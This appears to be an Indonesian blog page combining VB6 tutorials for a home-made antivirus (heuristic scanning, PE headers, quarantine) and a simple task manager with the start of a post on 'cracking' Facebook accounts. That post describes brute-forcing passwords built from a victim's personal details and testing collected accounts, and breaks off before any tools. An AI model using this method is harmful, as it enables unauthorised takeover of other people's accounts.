Code di atas adalah code untuk enkripsi/dekripsi pada virus yang akan di karantina

Buat lagi 1 module dengan nama modHeuristic
lalu masukan code di bawah ini

Private Declare Function ExtractIconEx Lib "shell32.dll" Alias "ExtractIconExA" (ByVal lpszFile As String, ByVal nIconIndex As Long, ByRef phiconLarge As Long, ByRef phiconSmall As Long, ByVal nIcons As Long) As Long
Private Declare Function DestroyIcon Lib "user32.dll" (ByVal hIcon As Long) As Long
Private Declare Function DrawIconEx Lib "user32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal cxWidth As Long, ByVal cyWidth As Long, ByVal istepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Boolean
Private Declare Function ExtractIcon Lib "shell32.dll" Alias "ExtractIconA" (ByVal hInst As Long, ByVal lpszExefileName As String, ByVal nIconIndex As Long) As Long
Private Const DI_MASK = &H1
Private Const DI_IMAGE = &H2
Private Const DI_NORMAL = &H3
Private Const DI_COMPAT = &H4
Private Const DI_DEFAULTSIZE = &H8
Private Const SHGFI_DISPLAYNAME = &H200
Private Const SHGFI_EXETYPE = &H2000
Private Const SHGFI_SYSICONINDEX = &H4000
Private Const SHGFI_LARGEICON = &H0
Private Const SHGFI_SMALLICON = &H1
Private Const ILD_TRANSPARENT = &H1
Private Const SHGFI_SHELLICONSIZE = &H4
Private Const SHGFI_TYPENAME = &H400
Private Const BASIC_SHGFI_FLAGS = SHGFI_TYPENAME Or SHGFI_SHELLICONSIZE Or SHGFI_SYSICONINDEX Or SHGFI_DISPLAYNAME Or SHGFI_EXETYPE
Private SIconInfo As SHFILEINFO
Private SectionHeaders() As IMAGE_SECTION_HEADER
Dim i As Integer
Dim j As Integer
Public Function CekHeuristic(Filename As String)
CekHeuristic = ""
On Error GoTo hError
Dim hFile As Long, bRW As Long
Dim DOSheader As IMAGE_DOS_HEADER
Dim NTHeaders As IMAGE_NT_HEADERS
Dim Filedata As String
DOS_HEADER_INFO = ""
NT_HEADERS_INFO = ""
hFile = CreateFile(Filename, ByVal (GENERIC_READ Or GENERIC_WRITE), FILE_SHARE_READ, ByVal 0&, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, ByVal 0)
ReadFile hFile, DOSheader, Len(DOSheader), bRW, ByVal 0&
SetFilePointer hFile, DOSheader.e_lfanew, 0, 0
ReadFile hFile, NTHeaders, Len(NTHeaders), bRW, ByVal 0&
If NTHeaders.Signature <> IMAGE_NT_SIGNATURE Then
If IsScript(Filename) = True Then
Open Filename For Binary As #1
Filedata = Space$(LOF(1))
Get #1, , Filedata
Close #1
CekHeuristic = CekHeur(Filedata)
End If
Exit Function
End If
CekHeuristic = CekIconBinary(Filename)
hError:
End Function
Private Function CekHeur(Data As String)
Dim hsl, asl As Integer
strasli = LCase(Replace(Data, vbNewLine, "$"))
For i = 1 To UBound(Bahaya)
hsl = 0
strData = Split(Bahaya(i), "|")
asl = 0
For k = 0 To UBound(strData)
xxx = LCase(strData(k))
If InStr(strasli, xxx) > 0 Then hsl = hsl + 1
asl = asl + 1
Next
If hsl = asl Then
CekHeur = "Malicious-Script"
Exit Function
End If
Next
CekHeur = ""
End Function
Private Function CekIconBinary(PathFile As String)
Dim q As Integer
Dim IconIDNow As String
CekIconBinary = ""
IconIDNow = CalcIcon(PathFile)
If IconIDNow = "" Then Exit Function
For q = 1 To UBound(IconDB)
If IconDB(q) = IconIDNow Then
CekIconBinary = "Malicious-Icon"
Exit Function
End If
Next q
End Function
Private Function CalcBinary(ByVal lpFileName As String, ByVal lpByteCount As Long, Optional ByVal StartByte As Long = 0) As String
Dim Bin() As Byte
Dim ByteSum As Long
Dim i As Long
ReDim Bin(lpByteCount) As Byte
Open lpFileName For Binary As #1
If StartByte = 0 Then
Get #1, , Bin
Else
Get #1, StartByte, Bin
End If
Close #1
For i = 0 To lpByteCount
ByteSum = ByteSum + Bin(i) ^ 2
Next i
CalcBinary = Hex$(ByteSum)
End Function
Private Function CalcIcon(ByVal lpFileName As String) As String
Dim PicPath As String
Dim ByteSum As String
Dim IconExist As Long
Dim hIcon As Long
IconExist = ExtractIconEx(lpFileName, 0, ByVal 0&, hIcon, 1)
If IconExist <= 0 Then
IconExist = ExtractIconEx(lpFileName, 0, hIcon, ByVal 0&, 1)
If IconExist <= 0 Then Exit Function
End If
frmUtama.sIcon.BackColor = vbWhite
DrawIconEx frmUtama.sIcon.hDC, 0, 0, hIcon, 0, 0, 0, 0, DI_NORMAL
DestroyIcon hIcon
PicPath = Environ$("windir") & "\tmp.tmp"
SavePicture frmUtama.sIcon.Image, PicPath
ByteSum = CalcBinary(PicPath, FileLen(PicPath))
DeleteFile PicPath
CalcIcon = ByteSum
End Function
Fungsi di atas adalah fungsi untuk mengecek suatu file dengan metode heuristic icon + heuristic untuk virus VBS


Buat 1 module dengan nama modIconCompare
lalu masukan code di bawah ini

Option Explicit
Private Const SHGFI_DISPLAYNAME = &H200, SHGFI_EXETYPE = &H2000, SHGFI_SYSICONINDEX = &H4000, SHGFI_LARGEICON = &H0, SHGFI_SMALLICON = &H1, SHGFI_SHELLICONSIZE = &H4, SHGFI_TYPENAME = &H400, ILD_TRANSPARENT = &H1, BASIC_SHGFI_FLAGS = SHGFI_TYPENAME Or SHGFI_SHELLICONSIZE Or SHGFI_SYSICONINDEX Or SHGFI_DISPLAYNAME Or SHGFI_EXETYPE
Public Type SHFILEINFO
hIcon As Long: iIcon As Long: dwAttributes As Long: szDisplayName As String * MAX_PATH: szTypeName As String * 80
End Type
Private Declare Function SHGetFileInfo Lib "shell32.dll" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As SHFILEINFO, ByVal cbSizeFileInfo As Long, ByVal uFlags As Long) As Long
Private Declare Function ImageList_Draw Lib "comctl32.dll" (ByVal himl As Long, ByVal i As Long, ByVal hdcDest As Long, ByVal x As Long, ByVal y As Long, ByVal flags As Long) As Long
Private shinfo As SHFILEINFO, sshinfo As SHFILEINFO
Private Declare Function DrawIconEx Lib "user32.dll" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal cxWidth As Long, ByVal cyWidth As Long, ByVal istepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
Private SIconInfo As SHFILEINFO

Public Enum IconRetrieve
ricnLarge = 32
ricnSmall = 16
End Enum

Public Sub RetrieveIcon(fName As String, DC As PictureBox, icnSize As IconRetrieve)
Dim hImgSmall, hImgLarge As Long
Debug.Print fName
Select Case icnSize
Case ricnSmall
hImgSmall = SHGetFileInfo(fName$, 0&, shinfo, Len(shinfo), BASIC_SHGFI_FLAGS Or SHGFI_SMALLICON)
Call ImageList_Draw(hImgSmall, shinfo.iIcon, DC.hDC, 0, 0, ILD_TRANSPARENT)
Case ricnLarge
hImgLarge& = SHGetFileInfo(fName$, 0&, shinfo, Len(shinfo), BASIC_SHGFI_FLAGS Or SHGFI_LARGEICON)
Call ImageList_Draw(hImgLarge, shinfo.iIcon, DC.hDC, 0, 0, ILD_TRANSPARENT)
End Select
End Sub
Public Function ExtractIcon(Filename As String, AddtoImageList As ImageList, PictureBox As PictureBox, PixelsXY As IconRetrieve, iKey As String) As Long
Dim SmallIcon As Long
Dim NewImage As ListImage
Dim IconIndex As Integer
On Error GoTo Load_New_Icon
If iKey <> "Application" And iKey <> "Shortcut" Then
ExtractIcon = AddtoImageList.ListImages(iKey).Index
Exit Function
End If
Load_New_Icon:
On Error GoTo Reset_Key
RetrieveIcon Filename, PictureBox, PixelsXY
IconIndex = AddtoImageList.ListImages.Count + 1
Set NewImage = AddtoImageList.ListImages.Add(IconIndex, iKey, PictureBox.Image)
ExtractIcon = IconIndex
Exit Function
Reset_Key:
iKey = ""
Resume
End Function
Public Sub GetLargeIcon(icPath$, pDisp As PictureBox)
Dim hImgLrg&: hImgLrg = SHGetFileInfo(icPath$, 0&, SIconInfo, Len(SIconInfo), BASIC_SHGFI_FLAGS Or SHGFI_LARGEICON)
ImageList_Draw hImgLrg, SIconInfo.iIcon, pDisp.hDC, 0, 0, ILD_TRANSPARENT
End Sub

kode di atas di butuhkan untuk metode heuristic icon pada antivirus

Buat 1 module dengan nama modLV
lalu masukan code di bawah ini

Public Function GetSelected(TheLV As ListView)
Dim Sel As String
For i = 1 To TheLV.ListItems.Count
If TheLV.ListItems.Item(i).Checked = True Then
Sel = Sel & "|" & TheLV.ListItems.Item(i).SubItems(1)
End If
Next
GetSelected = Sel
End Function

Public Function SelectedAll(TheLV As ListView)
For i = 1 To TheLV.ListItems.Count
TheLV.ListItems.Item(i).Checked = True
Next
End Function

Public Function SelectedNone(TheLV As ListView)
For i = 1 To TheLV.ListItems.Count
TheLV.ListItems.Item(i).Checked = False
Next
End Function

Public Function GetIndex(TheLV As ListView, Data As String) As Integer
For i = 1 To TheLV.ListItems.Count
If TheLV.ListItems.Item(i).SubItems(1) = Data Then
GetIndex = i
End If
Next
End Function

Public Function UnSelect(TheLV As ListView, Data As String)
For i = 1 To TheLV.ListItems.Count
If TheLV.ListItems.Item(i).SubItems(3) = Data Then
TheLV.ListItems.Item(i).Checked = False
End If
Next
End Function

Public Function AddDetect(TheLV As ListView, FilePath As String, VirData As String)
With TheLV
If Left(VirData, 9) <> "Malicious" Then
Set lvItm = .ListItems.Add(, , Split(VirData, "|")(0), , frmUtama.ImgSmall.ListImages(1).Index)
lvItm.SubItems(1) = FilePath
lvItm.SubItems(2) = Split(VirData, "|")(1)
lvItm.SubItems(3) = "Virus File"
Else
Set lvItm = .ListItems.Add(, , VirData, , frmUtama.ImgSmall.ListImages(1).Index)
lvItm.SubItems(1) = FilePath
lvItm.SubItems(2) = GetChecksum(FilePath)
lvItm.SubItems(3) = "Virus File"
End If
End With
End Function

Code di atas berguna untuk dengatur Listview pada saat virus terdeteksi

Buat 1 module dengan nama modPE
lalu masukan code di bawah ini

Public Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(1 To 4) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(1 To 10) As Integer
e_lfanew As Long
End Type

Public Type IMAGE_SECTION_HEADER
nameSec As String * 6
PhisicalAddress As Integer

VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long

End Type

Public Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
size As Long
End Type

Public Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUninitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
Win32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
Subsystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type

Public Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type

Public Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

Public Type IMAGE_EXPORT_DIRECTORY
Characteristics As Long
TimeDateStamp As Long
MajorVersion As Integer
MinorVersion As Integer
Name As Long
Base As Long
NumberOfFunctions As Long
NumberOfNames As Long
AddressOfFunctions As Long
AddressOfNames As Long
AddressOfNameOrdinals As Long
End Type

Public Type IMAGE_IMPORT_DESCRIPTOR
OriginalFirstThunk As Long
TimeDateStamp As Long
ForwarderChain As Long
Name As Long
FirstThunk As Long
End Type

Public Type IMAGE_IMPORT_BY_NAME
Hint As Integer
Name As String * 255
End Type

Public Const IMAGE_SIZEOF_SECTION_HEADER = 40
Public Const IMAGE_DOS_SIGNATURE = &H5A4D
Public Const IMAGE_NT_SIGNATURE = &H4550
Public Const IMAGE_ORDINAL_FLAG = &H80000000

Public Enum SECTION_CHARACTERISTICS
IMAGE_SCN_LNK_NRELOC_OVFL = &H1000000 'Section contains extended relocations.
IMAGE_SCN_MEM_DISCARDABLE = &H2000000 'Section can be discarded.
IMAGE_SCN_MEM_NOT_CACHED = &H4000000 'Section is not cachable.
IMAGE_SCN_MEM_NOT_PAGED = &H8000000 'Section is not pageable.
IMAGE_SCN_MEM_SHARED = &H10000000 'Section is shareable.
IMAGE_SCN_MEM_EXECUTE = &H20000000 'Section is executable.
IMAGE_SCN_MEM_READ = &H40000000 'Section is readable.
IMAGE_SCN_MEM_WRITE = &H80000000 'Section is writeable.
End Enum

Public Enum IMAGE_DIRECTORY
IMAGE_DIRECTORY_ENTRY_EXPORT = 0 ' Export Directory
IMAGE_DIRECTORY_ENTRY_IMPORT = 1 ' Import Directory
IMAGE_DIRECTORY_ENTRY_RESOURCE = 2 ' Resource Directory
IMAGE_DIRECTORY_ENTRY_EXCEPTION = 3 ' Exception Directory
IMAGE_DIRECTORY_ENTRY_SECURITY = 4 ' Security Directory
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5 ' Base Relocation Table
IMAGE_DIRECTORY_ENTRY_DEBUG = 6 ' Debug Directory
IMAGE_DIRECTORY_ENTRY_ARCHITECTURE = 7 ' Architecture Specific Data
IMAGE_DIRECTORY_ENTRY_GLOBALPTR = 8 ' RVA of GP
IMAGE_DIRECTORY_ENTRY_TLS = 9 ' TLS Directory
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10 ' Load Configuration Directory
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT = 11 ' Bound Import Directory in headers
IMAGE_DIRECTORY_ENTRY_IAT = 12 ' Import Address Table
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT = 13 ' Delay Load Import Descriptors
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14 ' COM Runtime descriptor
End Enum

code di atas berfungsi untuk pengecekan PE HEADER

buat 1 module dengan nama modScanning
lalu tambahkan code di bawah ini

Public jumlahDir As Long, jumlahFile As Long, jumlahVirus As Long
Public StopScan As Boolean

Public Function CekVirus(FilePath As String) As String
CekVirus = ""
For i = 1 To UBound(VirusDB)
If GetChecksum(FilePath) = Split(VirusDB(i), "|")(1) Then
CekVirus = VirusDB(i)
Exit Function
End If
Next
If FileLen(FilePath) / 1024 <= 512 Then
CekVirus = CekHeuristic(FilePath)
End If
End Function

Public Sub FindFilesEx(ByVal lpFolderName As String, ByVal SubDirs As Boolean)
Dim i As Long
Dim hSearch As Long, WFD As WIN32_FIND_DATA
Dim Result As Long, CurItem As String
Dim tempDir() As String, dirCount As Long
Dim RealPath As String, GetViri As String

GetViri = ""
dirCount = -1

ScanInfo = "Scan File"

If Right$(lpFolderName, 1) = "\" Then
RealPath = lpFolderName
Else
RealPath = lpFolderName & "\"
End If

hSearch = FindFirstFile(RealPath & "*", WFD)
If Not hSearch = INVALID_HANDLE_VALUE Then
Result = True
Do While Result
DoEvents
If StopScan = True Then Exit Do
CurItem = StripNulls(WFD.cFileName)
If Not CurItem = "." And Not CurItem = ".." Then
If PathIsDirectory(RealPath & CurItem) <> 0 Then
jumlahDir = jumlahDir + 1
frmUtama.lblDirScan.Caption = jumlahDir
If SubDirs = True Then
dirCount = dirCount + 1
ReDim Preserve tempDir(dirCount) As String
tempDir(dirCount) = RealPath & CurItem
End If
Else
jumlahFile = jumlahFile + 1
frmUtama.lblFileScan.Caption = jumlahFile
frmUtama.txtFileScan.Text = RealPath & CurItem
frmUtama.txtFileScan.SelStart = Len(frmUtama.txtFileScan.Text)
If WFD.nFileSizeLow > 5120 Or WFD.nFileSizeHigh > 5120 Then
GetViri = CekVirus(RealPath & CurItem)
If GetViri <> "" Then
AddDetect frmUtama.lvScan, RealPath & CurItem, GetViri
jumlahVirus = jumlahVirus + 1
frmUtama.lblFileDet.Caption = jumlahVirus
End If
End If
End If
End If
Result = FindNextFile(hSearch, WFD)
Loop
FindClose hSearch

If SubDirs = True Then
If dirCount <> -1 Then
For i = 0 To dirCount
FindFilesEx tempDir(i), True
Next i
End If
End If
End If
End Sub

Code di atas adalah code untuk scan file & folder pada antivirus

buat 1 module dengan nama modEtc
masukan code di bawah ini

Public Function Action(Data As String, TheLV As ListView, Mode As String)
Dim Filedata() As String
Dim fName, tmp, Status As String
Dim y As Integer
Filedata = Split(Data, "|")
For i = 1 To UBound(Filedata)
a = a + 1
If Mode = "Q" Then
fName = GetFileName(Filedata(i))
EncodeFile Filedata(i), AppPath & "Quarantine\" & Left$(fName, Len(fName) - Len(GetExt(Filedata(i)))) & ".avq"
AddQList TheLV, Filedata(i), Left$(fName, Len(fName) - Len(GetExt(Filedata(i)))) & ".avq"
DeleteFile Filedata(i)
Status = "Di Karantina"
ElseIf Mode = "D" Then
DeleteFile Filedata(i)
Status = "Di Hapus"
End If
y = GetIndex(TheLV, Filedata(i))
With TheLV.ListItems.Item(y)
.SubItems(3) = Status
.Checked = False
.SmallIcon = frmUtama.ImgSmall.ListImages(2).Index
End With
Next
Action = a
End Function

Public Function AddQList(TheLV As ListView, FilePath As String, Source As String)
Dim Dat As String
Dat = AppPath & "Quarantine\HN.dat"
If PathFileExists(Dat) <> 0 Then
Open Dat For Input As #1
Input #1, isi
Close #1
DeleteFile Dat
Else
isi = ""
End If
namavir = TheLV.ListItems(GetIndex(TheLV, FilePath))
If InStrRev(isi, Source, , vbTextCompare) = 0 Then
Open Dat For Output As #2
Print #2, isi & "|" & namavir & "?" & FilePath & "?" & Source
Close #2
Else
Open Dat For Output As #3
Print #3, isi
Close #3
End If
End Function

Public Function GetFileName(PathFile As String) As String
Dim i As Long
Dim DirString As Long
For i = 1 To Len(PathFile)
If Mid$(PathFile, i, 1) = "\" Then DirString = i
Next i
GetFileName = Right$(PathFile, Len(PathFile) - DirString)
End Function

Public Function GetExt(ByVal lpFileName As String)
Dim sTemp As String
Dim i As Long
sTemp = GetFileName(lpFileName)
If InStr(lpFileName, ".") Then
For i = 0 To Len(sTemp) - 1
If Mid$(sTemp, Len(sTemp) - i, 1) = "." Then
GetExt = Mid$(sTemp, Len(sTemp) - i, i)
Exit Function
End If
Next i
End If
End Function

Code di atas adalah kumpulan fungsi etc untuk scanning,karantina,delete
[/php]
sekarang tinggal cara membuat form quarantinenya

setelah form baru sudah di buat,lalu rubah nama formnya menjadi frmQuarantine

Tambah 1 buah listview dengan nama lvQ
lalu setting listview tersebut sesuai dengan gambar di bawah ini,cara setting listview sudah tertera di postingan ke #1

Tambahkan 3 buah Command button dengan nama

- cmdDelete
- cmdRestore
- cmdRestore(1)

Tambahkan code di bawha ini ke dalam Command [ cmdDelete ]

If lvQ.ListItems.Count = 0 Then Exit Sub
Dim Data() As String
If PathFileExists(Dat) <> 0 Then
Open Dat For Input As #1
Input #1, isi
Close #1
DeleteFile Dat
Else
isi = ""
End If
Data = Split(isi, "|")
For i = 1 To UBound(Data)
namafile = lvQ.SelectedItem.SubItems(2)
If namafile <> Split(Data(i), "?")(1) Then
nyu = nyu & "|" & Data(i)
End If
Next
DeleteFile AppPath & "Quarantine\" & lvQ.SelectedItem.SubItems(1)
Open Dat For Output As #2
Print #2, nyu
Close #2
MsgBox "Success Deleting File !!!", vbInformation, ""
UpdateQ

code di atas berfungsi untuk menghapus file yang telah di karantina

Masukan code di bawah ini ke Command [ cmdRestore ]

If lvQ.ListItems.Count = 0 Then Exit Sub
Select Case Index
Case 0
DecodeFile AppPath & "Quarantine\" & lvQ.SelectedItem.SubItems(1), lvQ.SelectedItem.SubItems(2)
MsgBox "File Restored to " & Chr(34) & lvQ.SelectedItem.SubItems(2) & Chr(34) & " !!!", vbInformation, ""
Case 1
sTitle = "Select path:" & vbNewLine & "Select path to restore file."
ThePath = BrowseFolder(sTitle, Me)
If ThePath <> "" Then
DecodeFile AppPath & "Quarantine\" & lvQ.SelectedItem.SubItems(1), ThePath & GetFileName(lvQ.SelectedItem.SubItems(2))
MsgBox "File Restored to " & Chr(34) & ThePath & GetFileName(lvQ.SelectedItem.SubItems(2)) & Chr(34) & " !!!", vbInformation, ""
End If
End Select
Fungsi code di atas berguna untuk me restore file kembali ke asalnya

Lalu pada Form_Load() tambahkan code di bawah ini

frmUtama.Enabled = False
Dat = AppPath & "Quarantine\HN.dat"
UpdateQ

Masukan code di bawah ini ke dalam frmQuarantine

Dim Dat As String
Private Sub UpdateQ()
lvQ.ListItems.Clear
Dim Data() As String
If PathFileExists(Dat) = 0 Then Exit Sub
Open Dat For Input As #1
Input #1, isi
Close #1
Data = Split(isi, "|")
For i = 1 To UBound(Data)
With lvQ.ListItems.Add(, , Split(Data(i), "?")(0))
.SubItems(1) = Split(Data(i), "?")(2)
.SubItems(2) = Split(Data(i), "?")(1)
End With
Next
Me.Caption = "Quarantine (" & lvQ.ListItems.Count & ")"
End Sub

Berfungsi untuk memanggil data yang ada di folder karantina


Nah sudah selesai kita membuat antivirusnya

Untuk mendownload source code lengkapnya dapat di download

Tutor Cara Bikin Task Manager Di VB 6::Enaknya Download Gratis::

Langkah-langkahnya :
1. Buka VB 6
2. Bikin 2 buah Command (Kill & Refresh) Jangan tanya masangnya gimana ya?
3. Copas Code Ini di Form..... Caranya Klick Kanan => View Code
Const TH32CS_SNAPPROCESS = &H2
Const TH32CS_SNAPTHREAD = &H4
Const TH32CS_SNAPMODULE = &H8
Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Const TH32CS_INHERIT = &H80000000
Const MAX_PATH As Integer = 260
Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    dwFlags As Long
    szExeFile As String * MAX_PATH
End Type
Private Declare Function CreateToolhelp32Snapshot Lib "Kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib "Kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "Kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32.dll" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32.dll" (ByVal hHandle As Long) As Long
Private Const PROCESS_ALL_ACCESS = &H1F0FFF
'Enum the path
Private Const PROCESS_QUERY_INFORMATION As Long = &H400
Private Const PROCESS_VM_READ = &H10
Private Declare Function EnumProcessModules Lib "psapi.dll" ( _
    ByVal hProcess As Long, _
    ByRef lphModule As Long, _
    ByVal cb As Long, _
    ByRef cbNeeded As Long) As Long
Private Declare Function GetModuleFileNameExA Lib "psapi.dll" ( _
    ByVal hProcess As Long, _
    ByVal hModule As Long, _
    ByVal ModuleName As String, _
    ByVal nSize As Long) As Long
   
Public Function PathByPID(pid As Long) As String
    'Fungsi ini berfungsi untuk mendapatkan informasi tentang aplikasi yang sedang
    'berjalan dengan menggunakan Process ID masing-masing aplikasi
    '----
    'Kode ini dapat dilihat di :
    'http://support.microsoft.com/default.aspx?scid=kb;en-us;187913
    Dim cbNeeded As Long
    Dim Modules(1 To 200) As Long
    Dim ret As Long
    Dim ModuleName As String
    Dim nSize As Long
    Dim hProcess As Long
   
    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION _
        Or PROCESS_VM_READ, 0, pid)
   
    If hProcess <> 0 Then
       
        ret = EnumProcessModules(hProcess, Modules(1), _
            200, cbNeeded)
       
        If ret <> 0 Then
            ModuleName = Space(MAX_PATH)
            nSize = 500
            ret = GetModuleFileNameExA(hProcess, _
                Modules(1), ModuleName, nSize)
            PathByPID = Left(ModuleName, ret)
        End If
    End If
   
    ret = CloseHandle(hProcess)
   
    If PathByPID = "" Then
        PathByPID = ""
    End If
   
    If Left(PathByPID, 4) = "\??\" Then
        PathByPID = ""
    End If
   

    If Left(PathByPID, 12) = "\SystemRoot\" Then
        PathByPID = ""
    End If
End Function
   
Private Sub List_Process()
    Dim lItem As ListItem
    Dim path As String
   
    Dim hSnapShot As Long, uProcess As PROCESSENTRY32

    'Memastikan agar semua List Box dalam keadaan kosong agar tidak terjadi penumpukan /duplikasi
    ListView1.ListItems.Clear
   
    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
        'Mendapatkan informasi tentang semua proses yang sedang dijalankan
    uProcess.dwSize = Len(uProcess)
    r = Process32First(hSnapShot, uProcess)
        'Mendapatkan informasi tentang proses yang pertama
    Do While r
        'perulangan selama r <> 0
        Set lItem = ListView1.ListItems.Add
        With lItem.ListSubItems
            .Add , , Left$(uProcess.szExeFile, InStr(1, uProcess.szExeFile, Chr$(0), vbTextCompare) - 1)
            .Add , , uProcess.th32ProcessID
            path = PathByPID(uProcess.th32ProcessID)
            .Add , , IIf(path <> "", path, "[Protected]")
        End With
        r = Process32Next(hSnapShot, uProcess)
            'Mendapatkan informasi dari proses selanjutnya pada windows
    Loop
    CloseHandle hSnapShot
End Sub


Private Sub cmdMatikan_Click()
    Dim processID As Long
    processID = CLng(ListView1.SelectedItem.ListSubItems(2).Text)
    TerminateProcess OpenProcess(PROCESS_ALL_ACCESS, 1, processID), 0
    Call List_Process
End Sub

Private Sub cmdRefresh_Click()
    List_Process
End Sub

Private Sub cmdTutup_Click()
    Unload Me
End Sub
Private Sub Form_Load()
Dim Wellcome As String
Wellcome = MsgBox("Task Manager Sederhana By Hackedbyme")
Wellcome = MsgBox("DC Is Our Forum ^^")
    List_Process
End Sub

Private Sub Form_Unload(Cancel As Integer)
MsgBox "Om Yakin Mau keluar?", vbQuestion + vbYesNo, "Exit Ah..!!!"
If (vbNo = True) Then
Call Form_Load
End If
End Sub

'maaf kalo tutor agak ribet :suram

Klick file => Make taskmanager.exe
5. Selesai

Belum punya VB 6 Nya?

Visual Basic 6 Portable
Visual Basic Full Version

Ini Projectnya => Project

Cracking Facebook::Enaknya Download Gratis::


Hacking Facebook ? What the Hell Was That ? mungkin kata yang satu itu udah ga asing lagi di telinga para pengguna Facebook, dari anak SD ampe nenek kakek yang make Facebook pasti ga asing dengan kata-kata "facebook saya di hack" atau "waduh facebook saya kena hack, mungkin anda yang sedang membaca tulisan ini juga pernah mengatakan hal serupa, tetapi pada dasarnya tau kah anda bahwa kejadin-kejadin seperti itu bukanlah "KENA HACK" melainkan kena CRACK, karena Hacker dan Cracker itu berbeda, dan taukah anda bahwa kejadian sperti itu bukan karena Si Cracker Jago atau Hebat atau Keren, Melainkan Karena Kelalaian kita (pengguna Facebook). pikir sendiri kenapa ?

Capek Mikir ? ya akun facebook kena hack karena kelalaian kita, seperti memberikan password berupa kata yang mudah di tebak, seperti nama pacar, hari ulang tahun pacar, nama orang terdekat, nama belakang, nama ayah, tanggal lagir dan kata lainya yang mudah untuk di pridiksi dari informasi diri kita, selain itu kebanyakan user (pengguna internet) malas menggunakan Antivirus yang menyediakan Firewall, atau Spyware, sehingga program-program jahat bisa saja mengambil data penting dari komputer yang kita gunakan tanpa kita sadari, Selain itu juga jaman sekarang sudah berubah, bisa masuk ke akun facebook orang lain saja sudah di anggap sebagai seorang hacker, padahal cuman masuk mengguanakn password tidak sengaja di tebak, atau malahan bikin akun trus masuk sendiri (lebay)

Belajar Menjadi Cracker ?

Tulisan saya ini bertujuan untuk memperkenalkan salah satu dari sejuta cara menjadi Cracker, tulisan ini bukan untuk mengajari anda menjadi orang yang jahat, melainkan menunjukan cara bagaiaman seorang Cracker bisa menembus akun facebook kita sehingga nantinya kita bisa terhindar dari kejahilan para cracker dunia maya ini, pada intinya seorang attacker akan mengumpulkan informasi sebanyak-banyak nya dari koraban, nantinya informasi itu akan disusun menjadi sebuah koleksi kata yang mungkin akan menjadi password dari si korban, di lain hal attacker juga sudah mempunyai banyak koleksi akun facebook yang sudah ia dapatkan, dan ingin memeriksa akun tersebut masih bisa digunakan atau tidak

teknik Cracker yang satu ini memang sudah tidak asing lagi, biasa di sebut dengan tebak-tebakan password, atau bruteforcing, pada tulisan-tulisan sebelumnya saya sudah membahas apa itu Password Bruteforcing, secara manual Akun Bruteforcing ini dilakukan dengan memasukan password yang mungkin satu demi satu, sehingga jika ada kemungkinan password sebanyak 150 kata maka kita harus memasukan password sebanyak 150 kali, melelahkan bukan menjadi seorang Cracker (dalam kasus menembus akun facebook), trus gimana caranya ?

Tools

